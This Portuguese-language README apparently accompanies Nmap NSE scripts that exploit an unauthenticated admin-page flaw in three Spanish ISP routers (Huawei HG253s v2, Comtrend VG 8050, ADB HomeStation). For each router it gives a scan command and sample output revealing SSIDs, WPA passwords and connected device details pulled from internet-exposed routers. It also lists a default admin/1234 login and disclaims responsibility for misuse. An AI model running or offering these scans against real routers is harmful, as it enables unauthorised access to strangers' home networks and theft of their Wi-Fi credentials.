
Alguns scripts NSE para pesquisar informações de roteadores
Alguns scripts NSE para procurar informações de routers.
O autor destes scripts é VicenDominguez. Ele encontrou o 0-Day na Huawei, eu apenas o modifiquei para dois outros.
O autor deste script não é responsável pela sua utilização.
#Huawei HG253s v2 A Vodafone-Espanha está a começar a alugar um novo router Huawei HG253v2 aos clientes espanhóis. Este novo router vem com uma nova versão de firmware.
##Vulnerability Basicamente, não está a validar o cookie de sessão em algumas páginas web de administração. Assim, é possível obter informações diretamente desses URLs em qualquer router aberto à internet.
##Usage
nmap --script=http-enum-vodafone-hua253s.nse -p80,443 -sS x.x.x.x
Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-vodafone-hua253s:
| SSID: vodafone070 (14:b9:XX:XX:XX:XX) Password: (AES) 123456
| Device: android-246e67b281179679-Wireless MAC: 48:5A:3F:XX:XX:XX IP: 192.168.0.XX
#Comtrend VG 8050 A Telefónica-Espanha está a começar a alugar um novo router Comtrend VG 8050 aos clientes espanhóis. Este novo router vem com uma nova versão de firmware. Este bug foi encontrado por DaniLabs
##Vulnerability Basicamente, não está a validar o cookie de sessão em algumas páginas web de administração. Assim, é possível obter informações diretamente desses URLs em qualquer router aberto à internet.
##Usage
nmap --script=http-enum-telefonica-comtrend-vg-8050.nse -p80,443 -sS x.x.x.x
Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-telefonica-comtrend-vg-8050:
| SSID: MOVISTAR_XXX
| Cipher Algorithm: WPA
| Password WEP:
| Password WPA: gTU3NkXE44RYjuM2RrxM
| Password WPA2:
| Device: 192.168.0.X MAC: 5c:97:X:X:X:X IP: 192.168.0.X
#ADB P.DGA4001N a.k.a HomeStation A Telefónica-Espanha está a começar a alugar um novo router ADB P.DGA4001N aos clientes espanhóis. Este novo router vem com uma nova versão de firmware. Este bug foi encontrado por DaniLabs
##Vulnerability Basicamente, não está a validar o cookie de sessão em algumas páginas web de administração. Assim, é possível obter informações diretamente desses URLs em qualquer router aberto à internet.
Adicionalmente, as credenciais por defeito são admin / 1234 ##Usage
nmap --script=http-enum-telefonica-homestation.nse -p80,443 -sS x.x.x.x
Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-telefonica-homestation:
| SSID: WLAN_HOME
| Cipher Algorithm: WEP
| Device: IphonePedro MAC: A8:8E:24:X:X:X IP: 192.168.1.X